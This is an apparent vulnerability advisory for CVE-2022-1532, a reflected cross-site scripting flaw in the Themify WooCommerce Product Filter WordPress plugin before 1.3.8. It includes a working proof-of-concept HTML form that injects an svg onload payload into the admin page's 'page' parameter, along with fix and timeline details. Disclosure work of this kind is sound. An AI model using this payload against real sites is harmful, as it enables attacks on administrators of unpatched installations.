Themify – WooCommerce Product Filter < 1.3.8 – Reflected Cross-Site Scripting | CVE 2022-1532 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the page parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpf_search" method="POST">
      <input type="hidden" name="page" value='wpf_search"><svg/onload=prompt(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

themify-wc-product-filter

Fixed in 1.3.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Utkarsh Agrawal

Submitter

Utkarsh Agrawal

Submitter website

https://smart7.in

Submitter twitter

Verified

Yes

WPVDB ID

d106cd93-cb9b-4558-9a29-0d556fd7c9e1

Timeline

Publicly Published

2022-05-18 (about 2 years ago)

Added

2022-05-18 (about 2 years ago)

Last Updated

2023-02-12 (about 1 years ago)

Other

Published

Title

Published

2024-02-28

Title

Beaver Builder – WordPress Page Builder < 2.7.4.3 - Contributor+ Stored XSS

Published

2021-05-07

Title

DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2021-12-15

Title

AMP for WP < 1.0.77.33 - Admin+ Stored Cross-Site Scripting

Published

2023-05-24

Title

Yoast SEO: Local < 15.0 - Contributor+ Stored XSS

Published

2023-07-05

Title

Simple Light Weight Social Share <= 2.0 - Admin+ Stored XSS